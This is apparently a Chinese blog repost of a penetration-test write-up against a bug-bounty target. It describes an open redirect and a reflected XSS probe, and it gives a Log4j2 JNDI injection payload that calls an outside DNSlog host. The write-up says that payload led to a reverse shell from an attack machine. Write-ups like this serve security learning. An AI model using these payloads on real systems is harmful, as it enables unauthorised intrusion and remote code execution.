终究没有人在意一家民营企业的生死

去泰国看了一场“成人秀”,画面尴尬到让人窒息.....

【少儿禁】马建《亮出你的舌苔或空空荡荡》

网友建议:远离举报者李X夫!

网曝黑人留学生侮辱中国女生是“母狗”,网友愤慨:不欢迎洋垃圾

生成图片,分享到微信朋友圈

自由微信安卓APP发布,立即下载! | 提交文章网址
查看原文

记录一次渗透经历

李白你好 2023-02-26
免责声明
由于传播、利用本公众号李白你好所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,公众号李白你好及作者不为承担任何责任,一旦造成后果请自行承担!如有侵权烦请告知,我们会立即删除并致歉。谢谢!


目标

次渗透的目标是补天上某项目,通过信息收集找到了登陆界面

对一个网站渗透的方法有很多,遇到这样的界面我们通常的思路就是查网站源码、万能密码登录、XSS、SQL注入、密码爆破、修改code进行未授权访问、未受保护的api信息泄露、忘记密码的逻辑绕过、命令执行如log4j2等漏洞,这时候就看我们各自的骚操作了。



URL跳转


直接F12大法,看一下网站前段源码

 

找到了一段跳转代码:

1

https://127.0.0.1/index?client_name=CasClient&realRequestUrl=https://xxx.com/abc


替换掉realRequestUrl参数为https://www.baidu.com

1

https://127.0.0.1/index?client_name=CasClient&realRequestUrl=https://www.baidu.com



XSS


在登录界面随便输入一个账号密码test,看一下返回的信息

 

得到错误信息,发现url里面有Get类型的错误参数,如果没有过滤的话我们将文字替换为<script>alert('1')</script> 可以得到XSS漏洞,没有过滤,拿下xss

 



Log4j RCE


后台渗透了一下,没进去,还是我太菜了,于是转到主页面进行渗透,任何一个参数都有可能是我们渗透过程中的刺刀。通过打入XSS、SQL和命令执行语句来进行判断网站是否存在漏洞。经过各个参数的注入,找到一个参数可以执行log4j2漏洞

playload:

https://127.0.0.1/search/opportunity?searchType=${jndi:ldap://test.7ih4h0.dnslog.cn}&pageNumber=1

然后利用jndi注入工具在攻击机上开启jndi服务器,利用payload开始攻击,获得反弹shell



结语


每一个参数都有可能是我们渗透成功的利刃,不要因为个别参数不行而放弃所有参数。



参考链接


本文作者:馒头的Blog

本文链接:https://www.cnblogs.com/mantou0/p/16479904.html


往期回顾


对BC站的渗透实战


2023新年新开始!


2022年被利用最多的5个漏洞


文章有问题?点此查看未经处理的缓存